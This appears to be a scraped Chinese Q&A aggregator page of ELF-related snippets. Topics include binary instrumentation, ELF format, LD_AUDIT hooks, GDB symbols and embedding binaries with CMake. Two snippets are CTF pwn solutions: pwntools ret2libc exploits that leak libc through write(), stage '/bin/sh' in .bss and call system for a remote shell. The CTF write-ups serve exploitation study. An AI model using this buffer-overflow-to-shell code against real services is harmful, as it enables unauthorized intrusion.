elf

How to extend a ELF binary

有些话、适合烂在心里 提交于 2020-03-28 03:55:00
问题 I am writing a small instrumentation tool. I must insert the instrumentation routine within the binary file. A good approach should be to insert those routines in a separate code segment and a separate data segment, could you explain how to accomplish this? Furthemore how can I modify the size of the code segment in the original file? Best, 回答1: I must insert the instrumentation routine within the binary file. A good approach should be to insert those routines in a separate code segment and a

ELF文件格式解析

核能气质少年 提交于 2020-03-26 09:36:47
copy from : https://blog.csdn.net/mergerly/article/details/94585901 1. ELF文件简介 首先,你需要知道的是所谓对象文件(Object files)有三个种类: 可重定位的对象文件(Relocatable file) 这是由汇编器汇编生成的 .o 文件。后面的链接器(link editor)拿一个或一些 Relocatable object files 作为输入,经链接处理后,生成一个可执行的对象文件 (Executable file) 或者一个可被共享的对象文件(Shared object file)。我们可以使用 ar 工具将众多的 .o Relocatable object files 归档(archive)成 .a 静态库文件。如何产生 Relocatable file,你应该很熟悉了,请参见我们相关的基本概念文章和JulWiki。另外,可以预先告诉大家的是我们的内核可加载模块 .ko 文件也是 Relocatable object file。 可执行的对象文件(Executable file) 这我们见的多了。文本编辑器vi、调式用的工具gdb、播放mp3歌曲的软件mplayer等等都是Executable object file。你应该已经知道,在我们的 Linux 系统里面,存在两种可执行的东西

Hook function to shared library unloading

狂风中的少年 提交于 2020-02-22 07:34:25
问题 I want to add hook function, which will be called when shared library is unloaded. Library is linked on complitaion. Is it possible to do such thing? Maybe gcc has flag for it? I saw similar solution for loading library on runtime, but it doesn't meet my expectations. 回答1: Solaris and GNU/Linux support the LD_AUDIT interface in their dynamic linkers. You need to load an auditor module which implements the la_objclose callback function: Runtime Linker Auditing Interface The implementation can

Hook function to shared library unloading

笑着哭i 提交于 2020-02-22 07:33:45
问题 I want to add hook function, which will be called when shared library is unloaded. Library is linked on complitaion. Is it possible to do such thing? Maybe gcc has flag for it? I saw similar solution for loading library on runtime, but it doesn't meet my expectations. 回答1: Solaris and GNU/Linux support the LD_AUDIT interface in their dynamic linkers. You need to load an auditor module which implements the la_objclose callback function: Runtime Linker Auditing Interface The implementation can

Where are GDB symbols coming from?

淺唱寂寞╮ 提交于 2020-02-14 06:28:35
问题 When I load Fedora 28's /usr/bin/ls file into GDB, I can access to the symbol abformat_init , even if it is not present as a string nor in the symbols table of the binary file. $ file /usr/bin/ls /usr/bin/ls: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=d6d0ea6be508665f5586e90a30819d090710842f, stripped, too many notes (256) $ readelf -S /usr/bin/ls | grep abformat $ nm /usr/bin/ls nm:

铁人三项(第五赛区)_2018_rop

和自甴很熟 提交于 2020-02-11 00:07:36
利用pwntools的DynELF from pwn import * r=remote('node3.buuoj.cn',29392) e=ELF('./2018_rop') write_plt=e.plt['write'] read_plt=e.plt['read'] main_addr=e.symbols['main'] bss_addr=e.symbols['__bss_start'] def leak(address): payload1='a'*(0x88+0x4)+p32(write_plt)+p32(main_addr)+p32(0x1)+p32(address)+p32(0x4) r.sendline(payload1) leak_address=r.recv(4) return leak_address d=DynELF(leak,elf=ELF('./2018_rop')) sys_addr=d.lookup('system','libc') payload2='a'*(0x88+0x4)+p32(read_plt)+p32(main_addr)+p32(0x0)+p32(bss_addr)+p32(0x8) r.sendline(payload2) r.sendline('/bin/sh') payload3='a'*(0x88+0x4)+p32(sys

xdctf2015_pwn200

自闭症网瘾萝莉.ら 提交于 2020-02-09 18:55:57
仰望一下 大佬 from pwn import * r=remote('node3.buuoj.cn',29989) elf=ELF('./bof') read_addr=elf.symbols['read'] write_addr=elf.symbols['write'] main_addr=0x804851c bss_addr=elf.symbols['__bss_start'] def leak(addr): r.recvline() payload='a'*0x6c+'b'*0x4+p32(write_addr)+p32(main_addr)+p32(1)+p32(addr)+p32(0x4) r.sendline(payload) leak_addr=r.recv(4) return leak_addr d=DynELF(leak,elf=ELF('./bof')) system_addr=d.lookup('system','libc') payload='a'*0x6c+'b'*0x4+p32(read_addr)+p32(main_addr)+p32(0x0)+p32(bss_addr)+p32(0x8) r.sendline(payload) r.sendline('/bin/sh') payload='a'*0x6c+'b'*0x4+p32(system

JZ2440裸机点亮LED【学习笔记】

痞子三分冷 提交于 2020-01-30 05:45:23
平台:jz2440 作者:庄泽彬 (欢迎转载,请注明作者) 说明:韦东山一期视频学习笔记 一、我们首先来做第一个实验,用汇编语言点亮板子上的LED。 1.1 LED的原理图 从下面的原理图可知LED1是连接到芯片的GPF4 1.2 相关的GPIO寄存器的配置 我们要点亮LED,就要把相关的端口配置成输出口,并且输出低电平。看看芯片手册,要GPF4输出低电平要配置GPFCON寄存器设置相应的位位01即为输出状态,在配置GPFDAT相应的位为0即可输出低电平。 1.3相关代码: led_on.S文件 1 .text 2 .global _start 3 _start: 4 LDR R0,=0x56000050 @ 设置R0为GPFCON寄存器 5 @ 用于配置端口的输入、输出状态 6 7 mov R1,#0x00000100 8 str R1,[R0] @ 设置GPF4端口为输出口 9 10 ldr R0,=0x56000054 @ 设置R0为GPFDAT寄存器 11 @ 用于配置端口输出的高低电平 12 13 mov R1,#0x00000100 14 str R1,[R0] @ 输出低电平 15 16 MAIN_LOOP: 17 B MAIN_LOOP Makefile文件 1 led_on.bin:led_on.S 2 arm-linux-gcc -g -c -o led_on

__do_global_dtors_aux and __do_global_ctors_aux

你说的曾经没有我的故事 提交于 2020-01-29 04:54:24
问题 I disassembled a simple program written in C++ and there are these two function names. I guess that ctor means constructor and dtor means destructor, and word global maybe means that they create and destroy global objects. I cannot guess the name aux. What do these two functions do? 回答1: The addresses of constructors and destructors of static objects are each stored in a different section in ELF executable . for the constructors there is a section called .CTORS and for the destructors there

CMake: Embed ELF into executable

谁说胖子不能爱 提交于 2020-01-22 09:58:09
问题 I have a project that needs access to an ELF file embedded into the executable in a special section. I was handcrafting Makefiles before and simply had a shell script where I used objcopy to copy the target I wanted to embed into an .o file, then link to this file in the executable. # Create a new section and copy the binary there ($1=input $2=output name) objcopy --input-target binary --output-target elf64-x86-64 \ --binary-architecture i386 $1 $2.o Now I want to get rid of the custom
订阅 elf